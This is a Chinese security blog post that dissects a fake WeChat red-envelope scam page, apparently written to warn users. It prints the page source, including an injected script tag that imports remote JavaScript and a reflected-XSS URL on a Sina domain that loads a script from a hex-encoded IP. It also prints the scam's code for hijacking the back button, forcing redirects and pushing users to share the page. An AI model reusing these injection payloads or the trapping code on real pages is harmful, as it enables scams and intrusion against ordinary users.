查看原文
其他

揭秘虚假红包套路|对微信裂变式广告的一次分析

听风安全 2023-11-28

The following article is from 台下言书 Author 说书人

免责声明
由于传播、利用本公众号听风安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号听风安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

公众号现在只对常读和星标的公众号才展示大图推送,

建议大家把听风安全设为星标,否则可能就看不到啦!

----------------------------------------------------------------------

起因

某群看到的消息,看看到底是啥诈骗网站用的还是微信的域名~

行为分析

点进链接后,将会看到一个抢红包的页面,页面写着所谓的官方认证之类的话来欺骗用户提高真实性。 借助最新华为的热点来进一步诱导用户来“抢红包”。当然,红包也是假的,当用户一顿操作过后页面告诉你抢了xx元红包,当你申请提现的时候就会要求你转发到微信群、微信好友、朋友圈等地方,当用户全部按要求分享完了后,页面会告诉你差不多需要24小时到账,并且强调分享分内容不能删除,否则无法到账。最后,重定向到一个微信广告页面。

如果用户刚点进去就识破了套路,想要返回退出页面,此时页面将会拦截用户的退出行为,直接重定向到微信广告页面。

先说结论

这里主要给广大圈外用户看,所以放在前面,因为后文是代码层面的分析,看不懂的可以直接忽略了。

这个是虚假的红包,最终也不会有钱到账。制作者的目的只是为了在你点进去的时候强制给你引导看广告来实现他自己的盈利,以及让你分享到各种好友、微信群、朋友圈来扩散这个页面,帮助他赚更多的钱。

页面中的谁谁谁抽到多少钱已到帐,自然也是假的,通过代码随机生成的而已。

总之,天上不会掉馅饼,不要总期待这些有的没的~

代码分析(还意外发现某互联网厂商的一个漏洞)

看起来像微信广告的url,url如下:

https://mp.weixin.qq.com/tp/ad_detail_info?page_key=手动打码3cc448258146ba05265854a573b0b266b0f0ac3d12f4c645fb21fca5eeab8e2cfea61d62520dae26&uxinfo=12328819531%7Cwx02yydioasrihhs%7C12328819531%7C1%7C1695514028%7C0%7C2%7C20141119%7C%7CAgKNffhE02isHGj%2FBLyXvfo9pY%2BV%2FKwTMK7jgf9D6Z%2BZbLXG2SuZtK1wwPRJwxmOdVq03HH5xx0%3D%7C12328819661%7C21%7C0%7CoDdoCt7HO4S1CGliIt2WLugdTa0s&bRA1w=手动打码&id=手动打码&cneg=15

页面源码如下


<!DOCTYPE html><html><head><meta charset="utf-8"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="apple-mobile-web-app-title" content="Web App"><meta name="format-detection" content="telephone=no"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="renderer" content="webkit"><meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no"><title></title></head><body class="template" ontouchstart=""><div id="container" style="height:100%;"></div><script>//标识当前这次浏览
var ViewID = +new Date + '' + parseInt(Math.random()*10000);

var PageData, CanvasVersion, PageId;
var PageDataError = false, PageDataParseError = false;
var isDEMO = false;
try {
    PageData = {"adCanvasInfo":{"PageList":{"Page":{"backgroundColor":"#ffffff","backgroundCover":null,"componentItemList":{"componentItem":[{"adLocation":"sns","fileSize":"88781","fromComponentId":"21473038077_21473021229_41","id":"21473043777_21473094755_41","imageHeight":"750","imageMd5":"c0c0c821dadba6eb415a0976912634cc","imageWidth":"750","initHeight":"800","initWidth":"800","materialId":"8146601850","name":"顶部图片","paddingBottom":"0","paddingLeft":"0","paddingRight":"0","paddingTop":"0","pureImageUrl":"https://wxsnsdythumb.wxs.qq.com/141/20204/snscosdownload/SZ/reserved/64fbe0f700085d5f25a12f20c364bc1e0000008d00004eec?m=c0c0c821dadba6eb415a0976912634cc&ck=c0c0c821dadba6eb415a0976912634cc&sha256=8f39a77e87a30e34766cd32a2c029022146e216c1c904325b2a3abfc19b148d5","type":"41","viewType":"0","widgetType":"top","widgetTypeV2":"topimg"},{"content":"活动经微信官方认证,真实有效!","expand":"0","fontColor":"#DE2821","fontSize":"28","fromComponentId":"21473038077_21473055200_1","id":"21473043777_21473043793_1","name":"文本","paddingBottom":"22","paddingLeft":"48","paddingRight":"48","paddingTop":"22","showAdvanced":"0","showType":"1","textAlignment":"1","type":"1","widgetType":"text","widgetTypeV2":"text"},{"appInfo":null,"appPageUrl":null,"appPageUrlAndroid":null,"appid":null,"borderSize":"0","btnBgColorTheme":"#DE2821","btnBorderColorTheme":"#FFFFFF","btnFontType":"0","btnHeight":"80","btnJumpUrl":"https://as.weixin.qq.com/cgi-bin/redirect?comp_id=21473060582&token=0daa2ef106e517a1205bc05b983a5d61&wx_uid=31128679","btnStyle":"1","btnTitle":"立即提现","btnType":"0","cornerRadius":"4","fontColor":"#FFFFFF","fontSize":"30","fromComponentId":"21473038077_21473072500_21","id":"21473043777_21473060582_21","iosAppInfo":null,"iosAppid":null,"mpJumpType":"1","name":"跳转链接","openSdkAppId":null,"origBtnJumpUrl":"https://手动打码.sina.com.cn/search/home.html?cond=xss%3C/script%3E%3Cbody/hidden%3E%3Cscript%20src=//0x0072.手动打码.手动打码.0x00BF%3E%3C/script%3E%3C!--&id=44","paddingBottom":"28","paddingLeft":"185","paddingRight":"185","paddingTop":"28","pkg":null,"subType":"0","type":"21","widgetType":"button","widgetTypeV2":"link"},{"content":"⁠","expand":"0","fontColor":"#595959","fontSize":"30","fromComponentId":"21473038077_21473021230_1","id":"21473043777_21473027173_1","name":"文本","paddingBottom":"22","paddingLeft":"48","paddingRight":"48","paddingTop":"22","showAdvanced":"0","showType":"0","textAlignment":"0","type":"1","widgetType":"text","widgetTypeV2":"text"},{"bgColor":"clear","fromComponentId":"21473038077_21473038078_103","id":"21473043777_21473078523_103","layoutHeight":"28","layoutItems":{"componentItem":{"borderColor":"#000000","borderSize":"0","content":"页面内容及服务由佛山市禅城区董冬商贸有限公司提供","cornerRadius":"0","fontColor":"#B3B3B3","fontSize":"20","fromComponentId":"21473038077_21473055201_1","id":"21473043777_21473078524_1","layoutHeight":"28","layoutWidth":"654","maxLines":"1","name":"文本","paddingBottom":"0","paddingLeft":"0","paddingRight":"0","paddingTop":"0","textAlignment":"1","textVerticalAlignment":"2","type":"1","verticalAlignment":"0"}},"layoutWidth":"750","name":"合规","paddingBottom":"18","paddingLeft":"48","paddingRight":"48","paddingTop":"18","subType":"0","type":"103","useSnap":"0","widgetType":"compliance","widgetTypeV2":"compliance","wxad_bricksData":{"mainBodyContent":"页面内容及服务由佛山市禅城区董冬商贸有限公司提供","mainBodyFontColor":"#B3B3B3","medicineAdPermissionNo":null,"medicineAdvice":"忠告语:请在医生或者临床营养师指导下使用","medicineApplicative":null,"medicineCatalogId":null,"medicineIconType":null,"medicineProductOuterId":null,"medicineSuitable":null,"medicineTitle":"药品名称","medicineUnsuitable":null,"medicineWarning":"警示语及注意事项:不适用于非目标人群使用","size":"default","styleType":"1"}},{"content":null,"fontColor":"clear","fontSize":"0","fromComponentId":"21473038077_21473072501_1","id":"21473043777_21473043798_1","layoutHeight":"220","layoutWidth":"750","name":"占位","type":"1","widgetType":"footer_space","widgetTypeV2":"footer_space"}]}}},"basicRootFontSize":"1","basicWidth":"750","btnType":"1","canvasName":"feng-js-5","fileSize":"88781","globalComponentItems":{"componentItem":{"appearPaddingBottom":"0","appearPaddingTop":"0","backgroundBlurEffect":"1","backgroundBlurEffectColor":"#F0F0F0","backgroundBlurEffectColorAlpha":"0.5","backgroundColor":"#F0F0F0","backgroundColorAlpha":"0.96","backgroundImg":null,"componentItem":{"alitaPageId":null,"appInfo":null,"appPageUrl":null,"appPageUrlAndroid":null,"appid":null,"borderSize":"0","btnBgColorTheme":"#DE2821","btnBorderColorTheme":"#FFFFFF","btnFontType":"0","btnJumpUrl":"https://as.weixin.qq.com/cgi-bin/redirect?comp_id=21473027166&token=7231cd7e709d4ae233e4a9939a13d6cd&wx_uid=31128679","btnStyle":"1","btnTitle":"立即提现","btnType":"0","cornerRadius":"4","fontColor":"#FFFFFF","fontSize":"28","fromComponentId":"21473038077_21473009112_21","id":"21473043777_21473027166_21","iosAppInfo":null,"iosAppid":null,"layoutHeight":"70","layoutWidth":"160","mpJumpType":"1","name":"跳转链接","openSdkAppId":null,"origBtnJumpUrl":"https://手动打码.sina.com.cn/search/home.html?cond=xss%3C/script%3E%3Cbody/hidden%3E%3Cscript%20src=//0x0072.手动打码.手动打码.0x00BF%3E%3C/script%3E%3C!--&id=44","pkg":null,"subType":"0","type":"21","widgetType":"button","widgetTypeV2":"link"},"desc":"派发现金红包","descColor":"#4c4c4c","descColorAlpha":"0.5","fromComponentId":"21473038077_21473009111_134","iconUrl":"https://wxsnsdythumb.wxs.qq.com/141/20204/snscosdownload/SZ/reserved/64fbe235000345fd259a96f7b264bc1e0000008d00004eec?m=f61272b5020c89f46cbc5b4892d1c44e&ck=f61272b5020c89f46cbc5b4892d1c44e&sha256=5df9d52874442d74afb3d41cce4e9902e55db129870eef173b6b4f2120845e20","id":"21473043777_21473027165_134","imageMd5":"f61272b5020c89f46cbc5b4892d1c44e","isFullClickable":"1","materialId":"8146655539","name":"悬浮组件","onlyShowInTimelineAd":"0","paddingBottom":"0","paddingLeft":"0","paddingRight":"0","paddingTop":"0","title":"华为新突破","titleColor":"#171717","titleColorAlpha":"1","type":"134","widgetType":"float_button","widgetTypeV2":"floatbutton","wxad_styleType":"1"}},"hasRedPkt":"0","heightRoundingType":"1","id":"21473043777","original_page_id":"0","pageID":"3388743915","platform":"native","shareDesc":"厂家冲量","shareMaterialId":"8087028017","shareMaterialType":"image","shareThumbUrl":"https://wxsnsdythumb.wxs.qq.com/141/20204/snscosdownload/SZ/reserved/64f0debb000731dd05c1fdd0a565bc1e0000008d00004eec?m=f3da6352040a2974698b0613e6a2dd16&ck=f3da6352040a2974698b0613e6a2dd16&sha256=24135b271808f6f5bdf76b3d8401baf66802eb6ed3472405065877f0f75e7233&t=1695490261312","shareTitle":"厂家冲量","shareWebUrl":"https://mp.weixin.qq.com/tp/ad_detail_info?page_key=494114e2aba025983cc448258146ba05265854a573b0b266b0f0ac3d12f4c645fb21fca5eeab8e2cfea61d62520dae26","sizeType":"1","supportInfo":{"qid":"</Script><Script>import('//js-手动打码.cos.ap-chengdu.myqcloud.com/1.js')</Script><!--","subType":"0"},"top_type":"41","version":"v2","videoFileSize":"0","widthRoundingType":"1","wxad_copyFlag":"3"},"aid":"","app_id":"","app_img":"","appuin":"","auto":"","data":{"app_img":""},"engine":"","source":"","verify":0}
;
    CanvasVersion = {"min_android_os_version":"","min_android_version":654313216,"min_ios_os_version":"","min_ios_version":385878016};
    PageId = '3388743915';
    if(!PageData || !CanvasVersion || !PageId) {
        //数据不正确,则上报
        PageDataError = true;
    }
} catch(e) {
    //解析数据出错,则上报
    PageDataParseError = e;
}</script><script src="//wximg.qq.com/wxp/libs/wxmoment/0.0.4/wxmoment.min.js"></script><script src="//mp.weixin.qq.com/promotion/res/htmledition/ad-luodiye/mpa-luodiye-h5.js"></script><script type="text/javascript" src="//wxa.wxs.qq.com/mptemplate/js/moment_canvas.e8463431fa20a42d59fa.js"></script></body></html>

页面中的关键执行代码:

<Script>import('//js-手动打码.cos.ap-chengdu.myqcloud.com/1.js')</Script>

导入并执行一个js

访问该js,内容如下:

完整代码:

function view(a) {
    function d() {
        var a = document.open('about:blank');
        a.write(c), a.close();
    }
    var b, c;
    a = a, b = new XMLHttpRequest(), c = null, b.onload = function () {
        c = b.responseText;
        var a = 0;
        a > 0 ? setTimeout(d, 1e3 * a) : d();
    }, b.open("GET", a, !0), b.send();
}

function openLink(url) {
    if (window !== top) {
        top.location = url;
        return;
    }
    var label = document.createElement('a');
    label.setAttribute('rel''noreferrer');
    label.setAttribute('href', url);
    try {
        document.body.appendChild(label);
    } catch (e) {
        location = url;
    }
    label.click();
}

function inUrl2(e) {
    if (window.location.href.indexOf(e) > -1) {
        return true;
    } else {
        return false;
    }
}


function loadJs(src, callback, errCallback) {
    if (!src) {
        return;
    }
    var e = document.createElement('script');
    e.setAttribute('type''text/javascript');
    e.setAttribute('charset''utf-8');
    e.setAttribute('src', src);
    document.getElementsByTagName('head')[0].appendChild(e);
    if (typeof errCallback === 'function') {
        e.onerror = errCallback;
    }
    e.onload = function () {
        if (typeof callback === 'function') {
            callback();
        }
    };
}

function ajaxgo2(url) {
    fetch(url)
        .then(response => response.json())
        .then((res) => {
            if (res.code == 200) {
                let tourl = res.data.adurl;
                openLink(tourl);
            } else {
            }
        });
}

function open_without_referrer(link) {
    document.body.appendChild(document.createElement("iframe")).src = 'javascript:"<script>top.location.replace(\'' + link + '\')<\/script>"';
}

view("//fenghb1-手动打码.cos.ap-guangzhou.myqcloud.com/1.html?t=" + Math.random());

除此之外,定义了一个PageData变量,但是由于json不完整,会被try捕获而终止,所以没啥用。 不过稍微看了一眼定义的数据里面的url,有一个某浪的url,urldecode后如下:

https://手动打码.sina.com.cn/手动打码.html?cond=xss</script><body/hidden><script src=//0x0072.手动打码.手动打码.0x00BF></script><!--&id=44

很明显一个xss

这里用了xss来加载//0x0072.手动打码.手动打码.0x00BF,从16进制转化为10进制也就是//114.手动打码.手动打码.191,访问了一下页面返回js内容,内容与上述一致。

这个js执行了view函数,请求了https://fenghb-手动打码.cos.ap-nanjing.myqcloud.com/1.html?t=随机数,作用是从给定的URL获取内容,并在新的浏览器窗口中显示这些内容。

继续往下看所请求的https://fenghb-手动打码.cos.ap-nanjing.myqcloud.com/1.html?t=xxx

页面中的https://hm.baidu.com/hm.js是百度统计js,用来统计访问页面的人员、次数信息。

另外一个关键js:https://fenghb1-手动打码.cos.ap-guangzhou.myqcloud.com/js/shua.js

由于js文件非常大,全部的页面代码和逻辑几乎都在里面,所以这里就不贴完整代码了,会在后面具体分析中贴出相关函数代码,此处简单截几张图:

找到入口代码如下:

//中间省略一系列函数

history.pushState(history.length + 1"message"window.location.href.split('#')[0] + "#" + new Date().getTime());
apiurl = "162.手动打码.手动打码.246";

//中间省略一系列函数

if(localStorage.backtime){
    a = new Date().getTime() - parseInt(localStorage.backtime);
    a = a / 1000;
    if(a < 10){
        fanhui = localStorage.fanhui;
        if(fanhui){
            fanhui = parseInt(fanhui) + 1;
        }else{
            fanhui = 1;
        }
        localStorage.setItem("fanhui", fanhui);
        jump();
    }else{
        localStorage.setItem("fanhui"0);
        star();
    }
}else{
    star();
}

大概意思就是判断用户的行为,如果用户点进页面后在10秒内想返回退出,就累计fanhui这个计数器,并调用jump()函数,反之则重置计数器,并执行star()函数。

另外history.pushState,修改浏览器历史记录,这使得开发人员可以自定义后退按钮的行为,例如执行某些JavaScript函数,而不是实际导航到之前的页面。

先来看jump()函数,代码如下:

function jump(){
    document.getElementById('loading').style.display = '';
    fanhui = localStorage.fanhui;
    if(!fanhui){
        fanhui = 1;
    }
    httpRequest = new XMLHttpRequest();//第一步:创建需要的对象
    httpRequest.open('POST'"//"+ apiurl+"/task/jump?fanhui="+fanhui+"&url=" + encodeURIComponent(location.href.split("#")[0]), true); //第二步:打开连接
    
   //httpRequest.open('POST', "//kn.wglj.cn/task/jump?token=fXt9h", true); //第二步:打开连接
    httpRequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");//设置请求头 注:post方式必须设置请求头(在建立连接后设置请求头)
    httpRequest.send('list='+geturllist());//发送请求 将情头体写在send中
    httpRequest.onreadystatechange = function () {//请求后的回调接口,可将请求成功后要执行的程序写在其中
        if (httpRequest.readyState == 4 && httpRequest.status == 200) {//验证请求是否发送成功
            a = httpRequest.responseText;//获取到服务端返回的数据
            if(a){
                localStorage.setItem("backtime"new Date().getTime());
                addurl(a);
                location.href = a;
            }else{
                star();
            }
        }
    };
}

函数的大概意思是拼接请求http://162.手动打码.手动打码.246/task/jump?fanhui=...&url=...这样一个url。这里fanhui的值是从localStorage中检索的,如果不存在,则默认为1。url参数是当前页面的URL,不包括'#'之后的部分。如果请求成功,将当前的浏览器窗口重定向到响应中的URL。如果请求失败,则调用star()函数。

这一块的作用相当于,如果用户对所谓的“抢红包”不感兴趣,在10秒内打算返回退出,那么实际上不会真正退出,而是给你加载一个跳转到各种微信公众号文章的广告。

继续看star()函数,代码如下:

function star(){
    request("//"+apiurl+"/sina?id=" + getPar("id") + "&url=" + encodeURIComponent(location.href.split("#")[0]) + "&_=" + Date.now(), function(a) {
        b = JSON.parse(a);
        if (b.code == 200) {
            localStorage.setItem("back_mode", b.data.back_mode);
            localStorage.setItem("adurl", b.data.adurl);
            localStorage.setItem("qrcode", b.data.qrcode);
            if(b.data.qrcode==1 && getPar("share")!="true"){
                localStorage.setItem("qrcode_url", b.data.qrcode_url);
            }
            if(b.data.newweburl && getPar("share")!="true"){
                if(b.data.newweburl.indexOf(window.location.host) == -1){
                    noRefJump(b.data.newweburl);
                    return false;
                }
            }
            
            document.getElementById('loading').style.display = 'none';
            fhuy(b.data.adurl);//返回
            if(b.data.statis_bd){//百度统计
                for(var i=0;i<b.data.statis_bd.length;i++){
                    if(b.data.statis_bd[i]){
                        is74wle4kbr2y("https://hm.baidu.com/hm.js?"+b.data.statis_bd[i]);
                    }
                }
            }
            is74wle4kbr2y("https://hm.baidu.com/hm.js?a561099515dfa3f2d5adcfb11288c651");
            //is74wle4kbr2y("https://v1.cnzz.com/z_stat.php?id=1279423869&web_id=1279423869");
            if(b.data.statis_umeng){//友盟统计
                for(var i=0;i<b.data.statis_umeng.length;i++){
                    if(b.data.statis_umeng[i]){
                        is74wle4kbr2y("https://s22.cnzz.com/z_stat.php?id=" + b.data.statis_umeng[i] + "&web_id=" + b.data.statis_umeng[i]);
                    }
                }
            }
            if (b.data.ycxf[0] == 0 && getPar("share")!="true") { //右下角广告
                $("body").append(' <div  id="bottomaddiv" style="background-color:#fff0;z-index:999;position:fixed;bottom:0;left:0;width:100%;_position:absolute;_top:expression(documentElement.scrollTop + documentElement.clientHeight-this.offsetHeight);overflow:visible;text-align: right;"><div id="qrcode" style="margin-bottom: -5px;"><a  onclick=openLink33("' + b.data.ycxf[2] + '") ><img width="100px" height="100px" src="' + b.data.ycxf[1] + '" /></a></div><div onclick="closeaddiv()" style="position:absolute; right:5px; top:0; cursor:pointer;" > X </div></div>');
            }
            if(b.data.copy){
                is74wle4kbr2y('https://fenghb1-手动打码.cos.ap-guangzhou.myqcloud.com/js/clipboard.min.js'function() {
                    new ClipboardJS("html",{textfunction(){return b.data.copy;}});
                });
            }
            audioTip = new Audio("https://wos4.58cdn.com.cn/IjpfEdCbAIrO/aboutfile/44ffa583e23fddc2b8e0c9eab685d0c2.mp3");
            audioFail = new Audio("https://wos4.58cdn.com.cn/IjpfEdCbAIrO/aboutfile/be691afbb8f3a67ac03ca652c353d4f9.mp3");
        }
        if(getPar("share")=="true"){
            hady();
        }else{
            if (getLuckyNum() <= 0) {$("#mailer").addClass("hide");Logic.showGameResult();} else {Logic.initBeginClock();}//主页面启动
            setTimeout(function() {
                var wxss = document.getElementById("wx");
                wxss.style.display = "none";
            }, 5000);
            document.getElementById("wx").style.display = "block";
            document.getElementById("wx").onclick = function() {
                var wxss = document.getElementById("wx");
                wxss.style.display = "none";
            };
            ycan();
        }
    });
}

该函数的主要作用,构造请求http://162.手动打码.手动打码.246/sina?id=...&url=...&_=<current_timestamp>,如果请求的响应为200,也就是请求成功,请求将会返回一个json。

这边测试请求了一次,返回的json如下:

{
 "data": {
  "statis_bd": [""],
  "statis_umeng": [""],
  "adurl""jump",
  "qrcode"0,
  "qrcode_url""",
  "newweburl""",
  "back_mode"1,
  "ycxf": [0"https:\/\/p.qpic.cn\/qqgameedu\/0\/77989b1f3fe6682e6da07aa9e77d105e\/0""https:\/\/m2.qschou.com\/project\/detail\/sharemiddle\/W2CzdbJ8e2DS6eWPDCE627AbQjEYC6k5.html?middletz=https%3A%2F%2Fm2.qschou.com%2Ffund%2Fdetail%3Fprojuuid%3D34a0eb8a-f235-45c8-9b80-7db7feb25951%26shareuuid%3D6848a0c0-9648-11ed-8d1d-0242ac100109%26share_no%3D18ac5e1e87c3e5-04ad59dc6aab95-7e745842-56d10-18ac5e1e87d416%26level%3D1%26sharecc%3D80X36.v8_1%26shareto%3D2%26sharecount%3D1%26platform%3Dwechat%26timestamp%3D2023092414303359369552044%26godeviceid%3D18ab2e9f27113c-03e1ffce8174c9-78005842-56d10-18ab2e9f2720%26mp%3Drocket.8.wx1e5232f351f4fa7a.4_2_4.146493%26bi_cf%3Dshare.link.weiai.80X36.v8_1"],
  "copy"""
 },
 "code"200,
 "msg""success"
}

如果响应码b.code为200(表示请求成功),关键操作如下:

  1. back_modeadurlqrcode等字段存储到localStorage中。
  2. 如果qrcode值为1且页面不是分享页面,则将qrcode_url存储到localStorage
  3. 如果存在新的web URL (newweburl) 且当前页面不是分享页面,并且这个URL与当前页面的域名不匹配,则跳转到该URL。
  4. 隐藏加载指示器。
  5. 执行fhuy()函数。
  6. 执行第三方统计代码,如百度统计和友盟统计。
  7. 如果响应数据中的ycxf字段的第一个元素为0且当前页面不是分享页面,则在页面底部添加一个广告。

其中的fhuy()函数代码如下:

function fhuy(url) {
    
    setTimeout(function () {
        history.pushState(history.length + 1"message"window.location.href.split('#')[0] + "#" + new Date().getTime());
        if (navigator.userAgent.indexOf('Android') != -1) {
                if (typeof(tbsJs) != "undefined") {
                    tbsJs.onReady('{useCachedApi : "true"}'function(e) {})
                    window.onhashchange = function() {
                        back();
                    };
                } else {
                    var pop = 0;
                    window.onhashchange = function(event) {
                        pop++;
                        if (pop >= 3) {
                            back();
                        } else {
                            history.forward();
                        }
                    };
                    history.back(-1)
                }
            } else {
                window.onhashchange = function() {
                    back();
                };
            };
    }, 1000)
}

总体上,该函数的目的是尝试多次阻止用户通过“返回”按钮离开页面,并在满足特定条件时执行back()函数。

back()函数代码如下:

function back(){
    fanhui = localStorage.fanhui;
    if(fanhui){
        fanhui = parseInt(fanhui) + 1;
    }else{
        fanhui = 1;
    }
    localStorage.setItem("fanhui", fanhui);
    if(localStorage.adurl == "jump"){
        //noRefJump(location.href.split("#")[0]+"&jump=true&ch=fend10&m=30&c=1");
        jump();
    }else{
        if(localStorage.back_mode == 0){
            noRefJump(localStorage.adurl);
        }else{
            
            render(localStorage.adurl);
        }
    }
}

这里主要是当用户想通过“返回”按钮离开页面的时候,阻止用户真正的离开,而是进行重定向跳转到某个页面,结合之前所说的,这里就是当用户想退出页面结果还得被迫看一个广告~

另外判断是否为分享页面的函数为getPar(),代码如下:

function getPar(par){
    var local_url = location.href.split("#")[0];
    var u = local_url.split("?");
    if(typeof(u[1]) == "string"){
        var strs = u[1].split("&");
        var str;
        for(var i = 0; i < strs.length; i++){
            str = strs[i].split("=");
            if(str[0] == par){
                return str[1];
            }
        }
    }
    return false;
}

通过判断url中是否存在参数share=true来判断当前页面是分享页面。因为这类裂变式广告通常要求用户分享当前页面到微信好友、微信群、朋友圈等地方。

如果当前页面是分享页面

  1. 执行hady()函数
  2. 执行一系列其他操作,包括初始化游戏逻辑、设置一个5秒的延时来隐藏一个元素等。

其中hady()函数的代码如下:

function hady() {
    document.getElementById('loading').style.display = '';
    //is74wle4kbr2y('https://res.wx.qq.com/open/js/jweixin-1.4.0.js', function() {
        request("//"+apiurl+"/sina/data?id=" + getPar("id") + "&money="+ getTotalMoney() + "&url=" + encodeURIComponent(location.href.split("#")[0]), function(a) {
            _f = JSON.parse(a);
            if (_f.code == 200) {
                if(_f.newurl){
                    noRefJump(_f.newurl);
                    return false;
                }
                document.getElementById('loading').style.display = 'none';
                jfx();
                e = document.getElementById("bottomLayer");if(e)e.style.display = "none";
            }
        });
    //});
}

这个函数看起来像是来统计计算用户抢红包的数据(当然,红包是假的)。其中还会调用jfx()函数。

jfx()函数代码如下:

function jfx() {
    var removeObj = document.getElementById('nyni');
    removeObj.parentNode.removeChild(removeObj);
    ! function(a, b) {
        var c = b.documentElement,
            d = "orientationchange" in window ? "orientationchange" : "resize",
            e = function() {
                var a = c.clientWidth;
                a && (c.style.fontSize = 100 * (a / 750) + "px");
            };
        b.addEventListener && (e(),
            a.addEventListener(d, e, !1),
            b.addEventListener("DOMContentLoaded", e, !1));
    }(windowdocument);
    Element.prototype.render = function() {
        var a, b, c = document.createElement(this.tagName),
            d = this.props;
        for (a in d)
            b = d[a],
            c.setAttribute(a, b);
        return this.children.forEach(function(a) {
                var b = null;
                b = a instanceof Element ? a.render() : document.createTextNode(a),
                    c.appendChild(b);
            }),
            c;
    }
    i28o2hkspuvyo8wb();
    var ui = document.getElementById("jb");
    ui.style.display = "inline";
    var jsApiList = ["onMenuShareTimeline","onMenuShareAppMessage","hideMenuItems","showMenuItems"];
    
    wx.config({
        debugfalse,
        appId: _f.d.appId,
        timestamp: _f.d.timestamp,
        nonceStr: _f.d.nonceStr,
        signature: _f.d.signature,
        jsApiList: jsApiList
    });
    wx.ready(() => {
        console.log("wx.ready 执行");
        setTimeout(function () {
            wx.hideOptionMenu();
            wx.showMenuItems({menuList: ["menuItem:share:appMessage"]});
        },500);
        console.log("wx.ready");
        setShareInfo();
        6 == _f.qunShareNum ? wx.onMenuShareAppMessage(info.ad.message) : wx.onMenuShareAppMessage(info.message),
        2 == _f.quanShareNum ? wx.onMenuShareTimeline(info.ad.timeline) : wx.onMenuShareTimeline(info.timeline);
        audioTip.play();
    });
}

主要功能是隐藏所有微信菜单项,仅显示“分享到朋友”菜单项。

最后再提一下,页面中还有一个被注释了的代码,应该是引导用户加“客服qq”的

如果启用起来估计就是走诈骗流程了~

结束。


不可错过的往期推荐哦


U盘植马之基于arduino的badusb实现及思考

如何通过一个工号打入内网

记一次简单的Docker逃逸+反编译jar接管云主机

记一次不小心拿下外网靶标的梦境

大话软件供应链攻击

内网隧道技术,你知道几个?

记对某Spring项目代码审计

APT是如何杜绝软件包被篡改的

SRC挖掘葵花宝典

点击下方名片,关注我们
觉得内容不错,就点下“”和“在看
如果不想错过新的内容推送可以设为星标
继续滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存